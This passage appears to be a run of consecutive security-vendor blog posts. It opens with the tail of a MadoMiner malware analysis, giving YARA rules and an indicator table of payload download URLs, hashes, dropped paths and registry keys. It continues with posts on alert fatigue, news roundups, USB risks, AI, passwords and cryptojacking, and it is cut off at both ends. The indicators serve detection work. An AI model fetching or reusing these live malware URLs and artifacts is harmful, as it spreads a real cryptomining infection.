'@Wmic Process Where "Name='cmd.exe' And ExecutablePath='C:\\ProgramData\\Microsoft\\Natihial\\cmd.exe'" Call Terminate' nocase wide ascii condition: all of them } rule MadoMiner_Install_CpuInfo { meta: author = “quinnjp13@gmail.com reference = “https://www.virustotal.com/#/file/9b5223806c1662084d0cdaf98b040d4b205c7dd8ad2a997e7debc8287ea1825f/detection” Strings: $string_1 = “epykkfnx” nocase wide ascii $string_2 = "ahwsresh" nocase wide ascii Condition: all of them } rule MadoMiner_Install_x64dll { meta: author = “quinnjp13@gmail.com reference = “https://www.virustotal.com/#/file/2480b6faef77e7446bae9630a7bcb403c5aa94e97ccb9f28db83e8476ae57093/detection” Strings: $string_1 = "http://da.alibuf.com:3/dst.exe" nocase wide ascii $string_2 = "http://da.alibuf.com:3/mask.exe" nocase wide ascii Condition: All of them } rule MadoMiner_Install_x86dll { meta: author = “quinnjp13@gmail.com reference = “https://www.virustotal.com/#/file/f534fcd5a3648c77811f2986cc6da9460ad7d913f1c3f0829656bb0e6c2628bb/detection” strings: $string_1 = “http://da.alibuf.com:3/mado.exe” nocase wide ascii $string_2 = “http://da.alibuf.com:3/445.exe” nocase wide ascii condition: all of them } Indicators of Compromise   Samples   MD5   Size   IP   IOC x86.dll[first x86 installed dll] 69833a3ecc52f57a02656d46e1799dcc 70.7 KB http://da[dot]alibuf.com:3/ - x64.dll[first x64 installed dll] e9c6bf0de42aa2449f1ed4bbb50ddcd6 39.4 KB http://da[dot]alibuf.com:3/ - 445.exe [x86 Install.exe] 3c720a55b043564313000a4efb1d85c0 6.4 MB Ip[dot]3322.net www[dot]ip138.com C:\Windows\Install.exe C:\Windows\IIS\* C:\Windows\DemO.bat C:\Windows\DemC.Bat Mado.exe [ x86 Mask.exe] 4ae31911c1ef2ca4eded1fdbaa2c7a49 741.0 KB gle[dot]frebuf.info:80 Bmw[dot]hobuff.info:3 “C:\Windows\Fonts\svchost.exe” “C:\Windows\Fonts\rundllhost.exe” “HKLM\SYSTEM\CurrentControlSet\Services\EventLog” “HKLM\SYSTEM\CurrentControlSet\Services\ServiceMaims” “HKLM\SYSTEM\CurrentControlSet\Services\ServiceMais” Mask.exe [ x64 Install.exe] d8470f5c12f5a5fee89de4d4c425d614 1.3 MB Ip[dot]3322.net www[dot]ip138.com C:\Windows\Install.exe C:\Windows\IIS C:\Windows\DemO.bat C:\Windows\DemC.Bat Dst.exe [ x64 Mask.exe] 4ae31911c1ef2ca4eded1fdbaa2c7a49 741.1kb gle[dot]frebuf.info:80 BMW[dot]hobuff.info:3/ “C:\Windows\Fonts\svchost.exe” “HKLM\SYSTEM\CurrentControlSet\Services\EventLog” “HKLM\SYSTEM\CurrentControlSet\Services\ServiceMaims” “HKLM\SYSTEM\CurrentControlSet\Services\ServiceMais” CPUInfo.exe 2df2d6d9db08558e88f1636ed2acc146 5.7 MB Ip[dot]3322.net www[dot]ip138.com C:\Windows\IIS\CPUInfo.exe Sogou.exe [ 2nd module file] 4a14e7fb274462e844b5595210350400 4.6 MB Ip[dot]3322.net www[dot]ip138.com C:\Windows\Installer\conhost.exe 360Safe.exe [2nd Module File] ce606d80b44ea2aae81056b9088ba1e4 3.6 MB gle[dot]freebuf.info:80 C:\Windows\Fonts\rundllhost.exe       

Alert fatigue is a real problem in IT Security.  This can set in at the worst time, when an analyst checks their tools and sees yet another event, or even another 50-100 events, after they just checked. They click through events looking for the smallest reason they can find to dismiss the event so they won’t need to escalate, or further investigate, the issue.  They’ve been through this before, they can see where the real problems are, and they just want to get rid of these events and continue getting other work done.  Unfortunately, as many know, one innocent looking event could put you on the trail of a bad actor in the environment.  Each event must be investigated thoroughly to make sure that there is no evidence of an incident. Going through alerts multiple times, the fact that they can be very similar is a large part alert fatigue.  Another part of the cause is false positives.  Analysts may find it difficult to maintain vigilance when the majority of events that they go through are false positives. There are new technologies that have come out that claim they are able to reduce the number of false positives. While they may, or may not, be effective in ingesting alerts and identifying true positives, this only adds on to the workload of analysts, creating yet another tool to log into and get alerts from. There are also many articles currently about alert fatigue within cybersecurity. An article from Tripwire describes alert fatigue as a combination of too many false positives as well as a reason to raise the security awareness of your organization. Another article from CSO notes that a large number of organizations deal with too many false positives that overload their analysts. This article goes a step further and advises on several steps that can be taken to help reduce the risk of alert fatigue. These are definitely good steps to help your organization improve its ability to respond to alerts and reduce analyst workload. I recommend reading through and seeing what can be done. Tuning I would also add one more step: tuning. This seems obvious, but it is often overlooked. Let me first tell you what I mean by tuning. Tuning is a combination of reducing false positives, working with alerts, and correlating events and trends to ensure greater accuracy. Each of these helps the analyst by refining alerts being looked into. Tuning needs to be a balanced approach that will reduce the number of unnecessary events received and ensure that there are no blind spots an attacker can take advantage of to slip by unnoticed. The first step of tuning is to figure out what is important to alert on and what is not. In my opinion there is a big section of alerts that can be immediately kicked out of the analyst’s queue. That would be any blocked attacks. Attacks that are blocked by the technology guarding the perimeter and internals of the network and endpoints can be a great story to executives and can even give you trends and areas to look at to make sure that nothing else is needed for protection. However, the alerts that are generated that say something was blocked just add to the data that has to be looked into if sent to the analyst. What Alerts Do You Care About? Removing blocked attacks helps the analyst pay more attention to potential incidents that were not stopped. After you’ve done that, the next matter of importance is: what alerts do you care about? To determine that takes a bit of research. You need to determine what impacts you the most, down to what could be a threat but may, or may not, be worth investigating. That involves knowing: where sensitive information is located how it can be accessed, how it should be accessed (two very different things) who has access what traffic is normal on the network what should be on the endpoints, (the security baseline for endpoints) and many other variables This part is by far the longest part of the tuning process, and don’t think that the information is static. Once you have gathered this information you will need to lay down policies, standards and procedures for when a department or vendor changes how they interact with the network and endpoints. Be aware though, even if you manage to get those standards out, you will most likely be the last one to know what changes were made and why. Being adaptable to change is key.  This is the baseline for your network. Baseline Defines “Normal” Our baseline gives us what is normal.  However, we do not want to alert on something just because it deviates from the baseline. There are many events that will create a deviation that are not malicious in nature.  We want alerts that are malicious and are causing a deviation. A dropper was successful, a computer seems to be sending encrypted data through an unapproved channel, etc. You may also want to narrow focus down to targeted attacks. An example of this could be scanning activity. If you are scanning your endpoints with a vulnerability scanner, exclude it from alerting. Threat Landscape A more difficult challenge is determining what outside attacks are targeted on your industry, or even your organization. This is where threat intelligence (threat feeds) can assist.  It can help narrow your focus. A more recent item that may help with your focus is GreyNoise.io. This feed asserts itself as “anti-threat intelligence” and can help you on your alerting by reporting on widespread and non-targeted events.  Essentially use them to help you exclude what is not targeted at you directly. In order to determine what alerts are valuable you need to know what is worth investigating.  You need to know what the threat landscape is for your industry and your organization specifically.  Once you have that information you will have a good idea what you should be on the lookout for. This is your threat landscape.  If you take your threat landscape and apply that to the baseline of “known good” you will have a good idea of what alerts you need, what alerts would be useful, and how to configure those alerts to your organization. This, just like your baseline, is not a static target, and you must stay up to date on new threats and information.  Once again, adaptability is key for success. Tune for False Positives Congratulations, you now have a list of alerts that your analyst will be checking and watching for what matters to your organization. You aren’t through yet though. You will need to tune the technology for false positives, adapt to changes in the network, and keep on top of the ever changing threat landscape. Analysts are great sources of information in this. They can tell you what triggered that new false positive what might be new trend they are seeing, etc. Just remember, when tuning for a false positive you need to ensure that only the false positives are removed. If you tune too much one way you may be creating a blind spot.  Once you have the alerts where you want them, and analysts have a stable (but not overwhelming) number of alerts you may want to start looking for opportunities to look at widening the net, taking a look at what else could be helpful to look at. Just make sure that you are not overly burdening your analysts. I recommend implementing new alerts in a testing environment while making sure that you are the only one monitoring the new alert. That way you can tune your rule before you start acting on it. Doing it this way can help ensue you will deliver a rule that can be trusted immediately. Always keep in mind the goal of tuning is to protect your organization. This is only achievable when alerts are able to be investigated in a timely manner and analysts are able to look through events without doubting the validity of the alerts or becoming overwhelmed by the volume of alerts. Management Support for Security Analysts This is a completely tool/technology agnostic approach to tuning that is applicable and viable in any organization.  But what if you already have a list of alerts that your analysts are looking at?  Well the best approach is to ensure that you have management approval to implement a plan of action to review and replace your existing alerts using the process above.  That will help out in the long run, but there may be issues with this. Management may require that certain things are looked at due to historical issues.  They may want alerts set up for specific circumstances.  As most are aware, nothing can happen the ideal way.  However, if you work together with your management you will be able to come up with a list of alerts and criteria that will work in everyone’s favor.  The support of your management team is important. Just like you, they weigh requirements they have been given with the associated risk to determine best practices. Improving visibility while reducing the risk of alert fatigue is good for the organization and management. As such, common ground is not hard to find, and will ensure that no goals are missed through the tuning process.   Conclusion Alert fatigue is something that is well documented and has several causes.  Tuning can help with alert fatigue. It takes effort, and like monitoring events, never really ends. However, it will make a huge difference in both the number and quality of the alerts.  Before turning to other solutions, make sure that you are tuning the technologies that are already protecting your organization.  You will notice a substantial difference by doing so, and you might find that you do not need the extra solutions.  With the goal of protecting your organization, you must take an active role in your technology.  You need to enable your analysts by providing them well defined tuned alerts.  This will both increase your security capabilities and help prevent alert fatigue. For easy reference I have an easy checklist to go through that will help you in the tuning process: Check the event queue that your analysts are going through each day. Remove the events that are blocked from the queue but analyze them for trends and potential targets and weaknesses within your organization. Determine the baselines on your network and endpoints. Determine your threat landscape and relevant alerts. Work with your analysts to tune out false positives. Determine what new alerts would be able to provide additional value to your organization and implement them only once they are tuned to an appropriate level. Stay vigilant and repeat steps 3 through 7.       

Forrester just released their “Security Analytics Wave” report that evaluates Security Analytics/SIEM technologies used by large enterprises (5000+ employees).   I am super excited that AlienVault was included for the first time and placed as a “Challenger”. This is quite incredible if you think about it. To include AlienVault as a challenger in a group of vendors that provide big data platforms to large enterprises is a major note on the state of the market.   AlienVault has always taken a contrarian approach to traditional SIEM/big data based security techniques.  We do not require our users to set up data lakes, or train machine learning algorithms - instead we make it as simple as possible to quickly detect threats, efficiently respond to breaches and manage compliance.   We provide a SaaS platform to remove the administrative overhead of a big data product, we integrate the essential security capabilities most customers need and our Labs team delivers Threat Intelligence on a daily basis to train all of the technologies in our platform.  The result is that 46% of our customers are investigating an alarm within 24 hours!! In contrast, it takes days maybe more to just deploy and populate a big data store leave alone constructing analytics workflows. In our early years we quickly gained a large, loyal following in organizations with less than 5000 employees.  Our approach has helped security champions in more than 7000 organizations around the world along with over 80000 subscribers to our Open Threat Exchange (OTX).  In fact, Forrester did an objective analysis of the impact USM Anywhere has had on some real world users of the product. They found that there was an 80% reduction in the time spent on ‘security engineering’ (time spent deploying, maintaining, integrating security technology), an 80% improvement in the time to detect an incident and an average of 6000 hours a year saved on their audits (2.5 full time employees!).  You can find this report here https://www.alienvault.com/resource-center/analyst-reports/forrester-total-economic-impact-study Our inclusion in the Wave reflects that our value proposition is now resonating with a broader set of customers by making a noticeable dent in ‘traditional’ approaches that require a security team to procure, deploy, integrate security controls into a data lake and research teams to stay current on threats and tune AI and ML algorithms.  In addition, organizations need an operations team to continuously monitor dashboards and respond to the threats. This approach is heavy in technology and heavy in people - it is exactly what we set out to solve with USM Anywhere. As we continue our evolution and become AT&T Cybersecurity it gives us access to one of the world’s largest cyber-security operations. We look forward to leveraging this knowledge to improve the USM Anywhere platform, deliver new capabilities and expand our threat intelligence to disrupt the status quo and help organizations of all sizes strengthen and simplify their security postures. To learn more about the USM Anywhere platform, you can take a look at our interactive demo (https://www.alienvault.com/products/usm-anywhere/demo) or call us (https://www.alienvault.com/contact).         

Next week I’ll be flying out to Dallas, Texas to attend the AT&T Business Summit. I’ve never been to Dallas before, so hope to check out the sites and maybe even find out who did shoot JR (if you’re born after 1983 that reference probably means nothing to you). Do Breaches Affect Stock Market Share Prices? A common question that comes up is whether a breach actually impacts a company’s share price or not. There are a varying degrees of opinions and anecdotes, but what we really need is data. Comparitech has published a very detailed breakdown, complete with methodology and data used. Some of the key findings include: In the long term, breached companies underperformed the market. After 1 year, Share price grew 8.53% on average, but underperformed the NASDAQ by -3.7%. After 2 years, average share price rose 17.78%, but underperformed the NASDAQ by -11.35%. And after three years, average share price is up by 28.71% but down against the NASDAQ by -15.58%. It’s important to note the impact of data breaches likely diminishes over time. Share prices of breached companies hit a low point approximately 14 market days following a breach. Share prices fall 2.89% on average, and underperform the NASDAQ by -4.6% After about a month, share prices rebound and catch up to NASDAQ performance on average After the first month, the companies we analyzed actually performed better than they did prior to the breach. In the six months leading up to a breach, average share price grew 3.64%, compared to 7.02% following a breach. Similarly, the companies underperformed the NASDAQ by -1.53% leading up to the breach, but managed to outperform it by 0.09% afterward. Finance and payment companies saw the largest drop in share price performance following a breach, while healthcare companies were least affected Breaches that leak highly sensitive information like credit card and social security numbers see larger drops in share price performance on average than companies that leak less sensitive info Analysis: How data breaches affect stock market share prices | Comparitech Europol Internet Organised Crime Threat Assessment 2018 Ransomware continues to be the biggest malware threat to businesses around the world, but mobile threats and cryptojacking are emerging as serious challenges, according to Europol. The law enforcement organization’s annual Internet Organised Crime Threat Assessment (IOCTA) provides a good snapshot of current industry trends. It reflects the findings of many security vendors: that ransomware is slowing but still the most widespread financially motivate threat out there, ahead of banking Trojans — and will be so for several years. DDoS attacks were second only to malware in terms of volume in 2017, as infrastructure becomes more “accessible, low-cost and low-risk.” Internet organised crime threat assessment 2018 | Europol IOCTA 2018 report (pdf) | Europol Europol: Ransomware Will be Top Threat for Years | Infosecurity Magazine Police must target crime-as-a-service market, says Europol | SC Magazine Ransomware Blanks Bristol Airport Screens For two days last week, airport officially were using posters and whiteboards to announce check-in and arrival information for flights going through the airport. Which shows it’s good to have a backup system in place. Cyber attack led to Bristol Airport blank screens | BBC Ransomware hits UK's Bristol Airport, affects flight information screens | CSO Online Run Critical Infrastructure Regardless of Malware As threats and cyber-attacks on critical infrastructure are expected to intensify in the near future, cyber-security experts believe that companies and government agencies should be prepared to operate networks even if there's malware or a threat actor on the network or not. The idea is that cyber-attacks should not cause downtime of any form, and networks should be designed in a way that an attacker's presence does not affect the network's availability for end users. Experts who believe in this approach are Major General Robert Wheeler, retired US Air Force, and former Deputy Chief Information Officer for Command, Control, Communications and Computers (C4) and Information Infrastructure Capabilities (DCIO for C4IIC), US Air Force. Critical infrastructure will have to operate if there's malware on it or not | ZDNet The Big Boys of Tech are Out of Their Depth I came across this interesting article where the author feels sorry for the big boys of tech, Zuckerberg, Dorsey, and others in similar positions. In many ways I agree with the main points that these founders may not be able to fix privacy and security issues on these social platforms - but then again, I don’t think there is a suitable replacement. That’s one of the problems when you enter new realities, there are no real maps to follow. Still, an article worth pondering over. Mark Zuckerberg is totally out of his depth | Bloomberg Other Random Stories I Liked this Week What the heck is a startup? | Crunchbase The Business case for curiosity | HBR Burnout in IT | Craig Dalrymple Multi-cloud is a trap | Brave new geek       

Carrying on with National Security Cybersecurity Awareness Month (NSCAM), we continue our celebratory blog series. This one is on the dangers the Universal Serial Bus (USB) and other removable media. USBs are called all kinds of things, from thumb drives to memory sticks to USB flash drives. USB’s sure are convenient. They’re tiny and you can get a 128GB one for about $25. They even come in cute form-factors. Companies used to give them away at security trade shows. They don’t anymore. This is because of the security risks associated with USBs. What are the Security Risks of USBs? Oh where to start. They could come preloaded with malware to infect everything that they are plugged into. A vendor may preload malware / spyware or benign but pesky software on them before shipping. A bad guy might install malicious software and convince you to plug it into your computer, or do it surreptitiously. A friend or child might bring home an infected stick and infect all the computers in your house. Don’t People Know Better? Some do. But a lot don’t. Bad guys may install malware on USB sticks and leave them to be found and used by naive users. A few years ago a study was done by researchers from Google, the University of Illinois Urbana-Champaign and the University of Michigan found that 48% of the drives they scattered around the Urbana-Champaign campus were picked up and used. USBs Can Be Used to Exfiltrate Proprietary Data Given the diminutive size of the USB, they can be easily pocketed and taken anywhere. They could be used to steal massive amounts of corporate data such as valuable customer information. It happens all the time. It is believed that Edward Snowden used a thumb drive to exfiltrate data from the NSA. The Risks of Removable Storage are So Severe IBM Banned Them Citing the security risks of USBs, IBM CISO Shamla Naidoo sent a memo out to all staff banning them. According to the memo, IBM: “is expanding the practice of prohibiting data transfer to all removable portable storage devices (eg: USB, SD card, flash drive).” A Video on the Dangers of USB Drives from Javvad Malik! What You Can Do About USB Usage on Corporate Networks Easy - AienVault’s Unified Security Management (USM) can detect USB usage on corporate networks. The USM agent can detect when USBs are plugged in to computers on your network. If you don’t use the USM agent, which has the USB function natively, you can script USB scripting into the config file of NXlog. You need to include the path where usb detection resides. NXlog will forward to USM. Here’s an article describing how.  USB Detection in USM Anywhere: USM checks for USBs on a 30 minute heartbeat as shown below: Rule Sets within the Agent shown below: Potential aftermath without preemptively detecting keylogger on USB shown below. Conclusion USM Anywhere can provide a way for IT and the SOC to be aware of any USB usage on the corporate network. Given all of the dangers of USB usage, that’s a big help. But even off the corporate network, stay safe! If in doubt, don’t plug it in!       

Recently, the Defense Advanced Research Project Agency (DARPA) announced a multi-year investment of more than $2 billion in new and existing programs in artificial intelligence called the “AI Next campaign. Agency director, Dr. Steven Walker, explained the implications of the initiative: “we want to explore how machines can acquire human-like communication and reasoning capabilities, with the ability to recognize new situations and environments and adapt to them.” Indeed, artificial intelligence (AI) and correlating machine learning (ML) applications have emerged as hot topics in the emerging technology and cybersecurity communities. They are about recognizing “new situations and environments” and adapting to them. According to KPMG, in 2017, AI was a major focus areas of global VC investments -over $12B and doubling the volume of 2016. Many of those investments included aspects relating to information security.  Now that the DARPA investment (that is directed to much more than cybersecurity uses) has been added to the investment money trail, there is no doubt AI will be part of our cybersecurity future. There is evidence that AI and ML can be valuable tools to help us navigate the cybersecurity landscape. Specifically it is being used to help protect against increasingly sophisticated and malicious malware, ransomware, and social engineering attacks. AI’s capabilities in contextual reasoning can be used for synthesizing data and predicting threats. AI and ML may become new paradigms for automation in cybersecurity. They enable predictive analytics to draw statistical inferences to mitigate threats with fewer resources.  In a cybersecurity context, AI and ML can provide a faster means to identify new attacks, draw statistical inferences and push that information to endpoint security platforms. This is especially important because of the major shortage of skilled cybersecurity workers and growing attack surface. According to Cybersecurity Ventures CEO Steve Morgan, the Human attack surface is to reach 6 billion people by 2022 and Cyber-crime damage costs to hit $6 trillion annually by 2021, AI and ML cybersecurity capabilities are very important and increasingly valuable. Former White House Cybersecurity Coordinator Rob Joyce said in a 2016 presentation at USENIX: “If you really want to protect your network,” he advised, “you have to know your network, including all the devices and technology in it.” A successful attacker will often “know networks better than the people who designed and run them.” With the right combination of data, computing power, and algorithms, artificial intelligence can help defenders gain far greater mastery over their own data and networks, detect anomalous changes (whether from insider threats or from external hackers), and quickly address configuration errors and other vulnerabilities.” To provide more depth to his insights, Both AI and ML can be integral aspects of automation and adaptive networks. Applications for automated network security include self-encrypting and self-healing drives to protect data and applications. Cognitive automation can also allow for horizon scanning and monitoring of networks that can report on deviations and anomalies in real time.  That automation includes automatic updating of defense framework layers (network, payload, endpoint, firewalls and anti-virus) and diagnostic and forensics analysis for cybersecurity. With those capabilities, it is no wonder why venture capitalists and government agencies are interested in AI. While AI and ML can be important tools for cyber-defense, they can also be a two edged sword. While they can be used to rapidly identify threat anomalies and enhance cyber defense capabilities, they can also be used by threat actors. Adversarial nations and nefarious hackers are already using AI and MI as tools to find and exploit vulnerabilities in threat detection models. They do this through a variety of methods. Their preferred ways are often via automated phishing attacks that mimic humans, and with malware that self-modifies itself to fool or even subvert cyber-defense systems and programs. Cyber criminals are already using AI and ML tools to attack and explore victims’ networks. Small business, organizations, and especially healthcare institutions who cannot afford significant investments in defensive emerging cybersecurity tech such as AI are the most vulnerable. Extortion by hackers using ransomware and demanding payment by cryptocurrencies may become and more persistent and evolving threat. The growth of the Internet of Things will create many new targets for the bad guys to exploit. There is urgency for both industry and government to understand the implications of the emerging morphing cyber threat tools that include AI and ML and fortify against attacks. Combating these machine-driven hacker threats requires being proactive by constantly updating and testing cybersecurity capabilities. Using AI and ML to recognize and predict anomalies associated with the data-base of behavioral patterns of malicious threats is a countermeasure.  Also employing adaptive data deception technologies to evade or fool potential hacker attacks can be effective. When it comes to adapting to new, sophisticated digital environments, AI and ML become key tools or innovative chess pieces in a cybersecurity strategy game. It likely will depend on the accuracy, speed, and the quality of the algorithms and supporting technologies to survive and thrive. To be competitive in a sophisticated game we need to be vigilant, innovative, and one step ahead. Thankfully, there are investment trends showing it is going in that direction.       

In today's world, the Internet is a vast place filled with websites, services, and other content. Most content along with computers and other technology requires a password. The number of passwords a person has to know continues to grow. While it’s safe to say we use passwords to keep our accounts confidential, they can also be very frustrating and inconvenient to create and remember. The outcome is the use of simple, common passwords, same password on different accounts, and habits such as writing passwords. Weak passwords are common For example, reports from Techspot.com, Fortune.com, and USAToday.com show, that in 2017, passwords like 123456 and football were two of the top ten most used passwords. Why are such passwords still being used? They are easy to remember.  People will often add weak passwords into simple variations where the alpha and number (numeric) strings combined with special characters. For instance, Football and 123456 become Football123456!, a memorable yet easily guessed password.  Current practices require complex passwords   Various companies have released their own best practices. Symantec’s how-to article, for instance, states a secure password is at least eight characters in length, has an uppercase, lowercase, and a number. Take [Football] for example. You can replace the “o” for a “0” and “a” for “@” resulting in F00tb@ll. Here, the updated password meets most policies enforced by many web applications such as Google and Outlook. It has an uppercase (F), a lowercase (tball), a number (00), a special character (@), and meets a minimum length of eight characters. Microsoft, however, takes this a step further in some of their guidelines. They state it must not be in the dictionary or incorporate the name of a person or computer. Guidelines such as those in place, demand a complex password. For example, W#T24.ro5*&F is complex yet painful to memorize.  There is a problem with difficult passwords People, out of convenience and frustration, will try to circumvent the password policies mentioned. This becomes more prevalent as the policies get stricter. It is hard enough to remember a password like W#T24.ro5*&F. By the time you’ve memorized it, the time has come to change it and you can’t repeat the last 8 passwords. So what do people do? They add or change one or two characters (i.e. W#T24.ro5*&F turns into W#T24.ro5*&F1 or W#T24.ro5*&F123 and F00tb@ll turns into F00tb@ll123 or F00tb@ll321).  While password expiration policies are arguably a best practice, they are not common outside an enterprise environment. Many websites, such as banks, do not require you to change your password regularly and those that do, might not have a decent policy on repeating passwords. This leads to the same or similar passwords used across accounts. The same password for different accounts is dangerous Research by LastPass states 59% of people use the same password and 47% apply the same even for work. Notably, the reuse of passwords stems from frustration and convenience. Sure, it's easier to remember one password for everything or variations of the base password, but not advised. To clarify, if an account gets compromised, it puts your other accounts at risk.  Using Passphrases is better  We have a hard time remembering many passwords and more so when they have to change often. Similar to starting a different job and learning coworkers' names. Then you find out 60 days later that everybody is being replaced and you now need to remember a different collection of names. It's difficult. For starters, use a passphrase that includes numbers. A passphrase is a password in usage but is longer for added security. For example, 2Cats3DogsRunFar is an easy to remember passphrase. It is a 16-character alpha-numerical password. Why add a number, aren't four or five words enough? No, because modern toolkits can crack a passphrase with four to five words. Adding a number (not just at the beginning or end), or even a space will strengthen the password while keeping it easy to memorize. NIST 800-63-3 supports the use of passphrases. Encourages users to make memorized secrets as lengthy as they want, using any characters they like (including spaces), thus aiding memorization. What about password managers? At the same time, we cannot use this passphrase for other accounts. Instead, use a password manager which will accommodate for having a different password for each account. A password manager is a tool or service that will store your passwords for later use. An example of a common password manager is your browser. I will point out it is not recommended to use your browser's password manager. Some password managers offer free or inexpensive versions. LastPass and RoboForms to name a couple; EverKey, Keeper, and DashLane are pay-to-use. Be responsible with your passwords All things considered, having the best passwords does not mean you are 100% immune. Password hashes are stored and anything stored can be stolen. Strong passphrases make it more difficult for a malicious actor. You can use password managers to store passwords but this itself can be risky. For example, browser password managers do not require multi-factor authentication. Remember not use words or dates that can be guessed via social engineering. If a website such as a bank, offers mutli-factor authentication then enable it. Overall, passwords can be a nuisance but dealing with compromised accounts can be much worse.        

With everything that keeps going on in the world of security, and the world at large, most eyes were focused on Tim Cook as he and his merry men took to the stage and announce the latest and greatest in Apple technology. There didn’t seem to be anything totally mind-blowing on the phone end. Just looked to be more bigger, faster, and powerful versions of the iPhones at eye-watering prices. The Apple watch now has a built-in FDA-approved ECG heart monitor. Which is pretty cool as an early-warning system that a stroke is imminent - I assume to allow you to take some smart HDR selfies, apply the correct filters, and post to Instagram before you collapse. But enough about that, let’s get down to business. British Airways Breached BA suffered a rather large breach which included payment information (including CVV) and personal details. While the investigation is ongoing, some security experts believe the breach was caused due to malicious code being injected into one of the external scripts in its payment systems. British Airways hack: Infosec experts finger third-party scripts on payment pages | The Register As an affected customer, I accept that companies get breached. But the advice seemed pretty poor. British Airways breached | J4vv4D Boards need to get more technical - NCSC The government is calling on business leaders to take responsibility for their organisations’ cyber security, as the threat from nation state hackers and cyber criminal gangs continues to rise. Ciaran Martin, head of NCSC believes that cybersecurity is a mainstream business risk and that corporate leaders need to understand what threats are out there, and what are the most effective ways of managing the risks. They need to understand cyber risk in the same way they understand financial risk, or health and safety risk. NCSC issues new advice for business leaders as Ciaran Martin admits previous guidance was “unhelpful” | New Statesman Hunting in O365 logs Cloud is great, but sometimes making sense of the logs can be a pain. If you’re struggling with O365 logs, then this document could be really useful. Detailed properties in the Office 365 audit log | Microsoft GCHQ data collection violated human rights, Strasbourg court rules GCHQ’s methods in carrying out bulk interception of online communications violated privacy and failed to provide sufficient surveillance safeguards, the European court of human rights has ruled in a test case judgment. But the Strasbourg court found that GCHQ’s regime for sharing sensitive digital intelligence with foreign governments was not illegal. It is the first major challenge to the legality of UK intelligence agencies intercepting private communications in bulk, following Edward Snowden’s whistleblowing revelations. GCHQ data collection violated human rights, Strasbourg court rules | The Guardian A Mega hack! Cloud storage service Mega.nz has announced that users that installed their Chrome browser extension may have had their passwords compromised. A malicious version of the browser extension was uploaded to the Chrome web store to gain access to user’s logins to Amazon, Microsoft, Github, and Google. MEGA Chrome Extension Hacked To Steal Login Credentials and CryptoCurrency | Bleeping computer The Effectiveness of Publicly Shaming Bad Security Is publicly shaming a company a good idea? Personally, I’ve tended to steer away from it - I don’t feel like it’s a very constructive approach. But when there’s data to prove otherwise (albeit we aren’t talking in the scientific sense), then one may need to reconsider. There are ample examples of companies that have fixed their security issues after being publicly shamed - as my favourite blogger from down under, Troy Hunt shares in his blog post. These are all good examples, but it’s not too far away from digital pitchforks and mobs going after institutes over a simple misunderstanding. The Effectiveness of Publicly Shaming Bad Security | Troy Hunt On the topic of shaming, I would recommend the book, “So, you’ve been publicly shamed” by Jon Ronson. FDA to Ramp Up Medical Device Cybersecurity Scrutiny The Food and Drug Administration should increase its scrutiny of the cybersecurity of networked medical devices before they're approved to be marketed, a new government watchdog agency report says. FDA says it will carry out the report's recommendations. The Department of Health and Human Services' Office of Inspector General's report recommends that FDA better integrate the review of cybersecurity in the agency's processes for premarket assessments of medical devices. About time! FDA to Ramp Up Medical Device Cybersecurity Scrutiny | Data Breach Today Hacking Tesla’s keyless entry With about $600 worth of equipment, it is possible to wirelessly read signals from a nearby Tesla owner’s fob. Less than two seconds of computation yields the fob’s cryptographic key, allowing the theft of the associated car without a trace. Hackers can steal a Tesla Model S in seconds by cloning its key fob | Wired Researchers Show Off Method for Hacking Tesla’s Keyless Entry, So Turn on Two-Factor Authentication | Gizmondo       

Last year, I wrote that ransomware was the summer anthem of 2017. At the time, it seemed impossible that the onslaught of global ransomware attacks like WannaCry and NotPetya would ever wane. But, I should have known better. Every summertime anthem eventually gets overplayed. This year, cryptojacking took over the airwaves, fueled by volatile global cryptocurrency markets. In the first half of 2018, detected cryptojacking attacks increased 141%, outpacing ransomware attacks. In this blog post, I’ll address cryptojacking: what it is, how it works, how to detect it, and why you should be tuning into this type of threat. What is Cryptojacking? Crytojacking definition: Cryptojacking is the act of using another’s computational resources without their knowledge or permission for cryptomining activities. By cryptojacking mobile devices, laptops, and servers, attackers effectively steal the CPU of your device to mine for cryptocurrencies like Bitcoin and Monero. Whereas traditional malware attacks target sensitive data that can be exploited for financial gain, like social security numbers and credit card information, cybercriminals that launch cryptojacking campaigns are more interested in your device’s computing power than your own personal data. To understand why, it’s helpful to consider the economics of cryptocurrency mining. Mining for cryptocurrencies like Bitcoin and Monero takes some serious computing resources to solve the complex algorithms used to discover new coins. These resources are not cheap, as anyone who pays their organization’s AWS bill or data center utility bill can attest to. So, in order for cryptocurrency mining to be profitable and worthwhile, the market value of the cryptocurrency must be higher than the cost of mining it – that is, unless you can eliminate the resource costs altogether by stealing others’ resources to do the mining for you. That’s exactly what cryptojacking attacks aim to do, to silently turn millions of devices into cryptomining bots, enabling cybercriminals to turn a profit without all the effort and uncertainty of collecting a ransom. Often, cryptojacking attacks are designed to evade detection by traditional antivirus tools so that they can quietly run in the background of the machine. Does this mean that all cryptomining activity is malicious? Well, it depends on who you ask. Cryptomining vs. Cryptojacking As the cryptocurrency markets have gained value and become more mainstream in recent years, we’ve seen a digital gold rush to cryptomine for new Bitcoin, and more recently, Monero. What began with early adopters and hobbyists building home rigs to mine for new coins has now given way to an entire economy of mining as a service, cryptoming server farms, and even cryptomining cafes. In this sense, cryptomining is, more or less, considered a legal and legitimate activity, one that could be further legitimized by a rumored $12 Billion Bitman IPO. Yet, the lines between cryptomining and cryptojacking are blurry. For example, the cryptomining “startup” Coinhive has positioned its technology as an alternative way to monetize a website, instead of by serving ads or charging a subscription. According to the website, the folks behind Coinhive, “dream about it as an alternative to micropayments, artificial wait time in online games, intrusive ads and dubious marketing tactics.” Yet at the same time, Coinhive has been one of the most common culprits found in cryptojacking attacks this year. In fact, one recent report analyzed cryptojacking sites and found that nearly 50,000 websites were running cryptocurrency malware, Coinhive among them. Recent Coinhive victims include the Los Angeles Times, Politifact.com, and both AOL and Google’s Ad Networks. Further blurring the lines, Coinhive has been heavily criticized for its handling of (or lack thereof) abuse complaints. As a result of the dramatic rise in cryptojacking attacks this year, many in the infosec community have come to consider all cryptominers as malware. And, browser developers have started to introduce browser extensions to block cryptomining activities, such as No Coin. This “trust-no-miner” sentiment is strong in the infosec community. According to our own AlienVault research, only 8% of cybersecurity professionals would consent to their computer being used for cryptomining in exchange for accessing content on a website, although slightly larger group of altruists (38%) would consent if that cryptomining activity benefited a charity. So, while legitimate cryptomining activities will likely continue to grow as the cryptocurrency markets evolve with investments in large-scale operations, it’s unlikely that cryptomining as a form of micropayment will gain mass adoption any time soon. Cryptojacking – What’s at Stake? While a cryptojacking attack might not be as acutely devastating as a ransomware attack, it can cause serious 